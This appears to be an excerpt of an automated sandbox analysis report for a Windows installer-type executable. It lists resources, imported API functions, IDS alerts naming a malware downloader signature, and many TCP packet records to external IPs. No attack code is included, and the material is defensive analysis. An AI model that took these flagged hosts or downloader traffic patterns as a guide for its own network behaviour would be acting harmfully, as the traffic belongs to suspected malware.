RT_ICON	0x3cda90	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.4413934426229508
RT_ICON	0x3ce418	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.3768050541516246
RT_ICON	0x3cecc0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	English	United States	0.4400921658986175
RT_ICON	0x3cf388	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	English	United States	0.14634146341463414
RT_ICON	0x3cf9f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.43786127167630057
RT_ICON	0x3cff58	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.37056737588652483
RT_ICON	0x3d03c0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.18548387096774194
RT_ICON	0x3d06a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.4594594594594595
RT_DIALOG	0x3d07d0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3d08d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3d09f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3d0ab8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3d0b18	0xbc	data	English	United States	0.601063829787234
RT_VERSION	0x3d0bd8	0x214	data	English	United States	0.5338345864661654
RT_MANIFEST	0x3d0df0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T10:36:47.259837+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	142.250.186.78	443	TCP
2024-11-21T10:36:56.775750+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	132.226.247.73	80	TCP
2024-11-21T10:36:59.510233+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	132.226.247.73	80	TCP
2024-11-21T10:37:01.172336+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49740	188.114.96.3	443	TCP
2024-11-21T10:37:02.650777+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49742	132.226.247.73	80	TCP
2024-11-21T10:37:17.561437+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49782	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 10:36:44.980994940 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:44.981054068 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:44.981163025 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:45.121364117 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:45.121416092 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:46.510962009 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:46.511061907 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:46.511744976 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:46.511811018 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:46.646081924 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:46.646126032 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:46.646533012 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:46.646599054 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:46.733537912 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:46.779337883 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:47.259778976 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:47.260000944 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:47.260029078 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:47.260107994 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:47.260230064 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:47.260267019 CET	443	49736	142.250.186.78	192.168.2.4
Nov 21, 2024 10:36:47.260322094 CET	49736	443	192.168.2.4	142.250.186.78
Nov 21, 2024 10:36:47.503606081 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:47.503648043 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:47.503726959 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:47.504060030 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:47.504076958 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:48.987441063 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:48.987561941 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:48.991178036 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:48.991188049 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:48.991451979 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:48.991523027 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:48.991853952 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:49.035357952 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.753031969 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.753096104 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.762665987 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.762717962 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.872567892 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.872709036 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.872724056 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.872765064 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.876586914 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.876641989 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.964488983 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.964569092 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.967269897 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.967356920 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.967366934 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.967410088 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.974812984 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.974874020 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.977854013 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.977904081 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.985563993 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.985626936 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.985793114 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.985841036 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.994340897 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.994395971 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:51.994405031 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:51.994461060 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.001476049 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.001539946 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.001560926 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.001605988 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.008795023 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.008857965 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.008950949 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.008997917 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.014961958 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.015012980 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.021059036 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.021116972 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.021128893 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.021179914 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.027422905 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.027483940 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.027508974 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.027560949 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.034250021 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.034300089 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.039671898 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.039726019 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.039731979 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.039776087 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.045834064 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.045890093 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.045939922 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.045994997 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.052409887 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.052469015 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.052530050 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.052577972 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.058391094 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.058449030 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.174149990 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.174236059 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.174259901 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.174315929 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.177469015 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.177527905 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.183216095 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.183291912 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.183392048 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.183437109 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.189332008 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.189393044 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.189562082 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.189610004 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.195553064 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.195606947 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.196003914 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.196053982 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.196085930 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.196135998 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.201678991 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.201746941 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.207899094 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.207961082 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.208031893 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.208076954 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.214230061 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.214293957 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.214351892 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.214400053 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.218914986 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.218977928 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.219118118 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.219165087 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.223526955 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.223587990 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.227962971 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.228019953 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.228348970 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.228394985 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.232613087 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.232669115 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.232973099 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.233025074 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.237432957 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.237490892 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.237721920 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.237771988 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.241782904 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.241837025 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.246400118 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.246464014 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.246562004 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.246609926 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.251202106 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.251265049 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.251405001 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.251466036 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.255661011 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.255717039 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.255980015 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.256037951 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.260344982 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.260401964 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.265008926 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.265069008 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.265093088 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.265137911 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.265552044 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.265599012 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.269660950 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.269717932 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.270231009 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.270275116 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.274221897 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.274277925 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.274478912 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.274528980 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.278736115 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.278806925 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.280168056 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.280217886 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.283752918 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.283808947 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.287925959 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.287990093 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.288144112 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.288189888 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.292862892 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.292932987 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.293147087 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.293194056 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.297074080 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.297137022 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.384835958 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.384917974 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.386126995 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.386179924 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.386342049 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.386390924 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.390280008 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.390322924 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.390454054 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.390499115 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.394741058 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.394788027 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.395270109 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.395323992 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.399884939 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.399936914 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.403515100 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.403574944 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.403712034 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.403755903 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.407793045 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.407844067 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.408612013 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.408680916 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.412175894 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.412225008 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.412555933 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.412601948 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.416603088 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.416656017 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.416891098 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.416939974 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.421050072 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.421104908 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.425421000 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.425491095 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.425707102 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.425757885 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.429785013 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.429842949 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.429929972 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.429975033 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.432955027 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.433017015 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.433087111 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.433134079 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.436647892 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.436703920 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.439433098 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.439486027 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.439560890 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.439606905 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.442683935 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.442735910 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.442760944 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.442811012 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.445892096 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.445943117 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.445980072 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.446021080 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.449158907 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.449206114 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.452213049 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.452260017 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.452527046 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.452693939 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.455475092 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.455529928 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.455559969 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.455606937 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.458916903 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.458967924 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.459181070 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.459225893 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.461899042 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.461947918 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.462436914 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.462486029 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.465365887 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.465416908 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.468350887 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.468400955 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.468628883 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.468674898 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.471590996 CET	443	49737	172.217.16.129	192.168.2.4
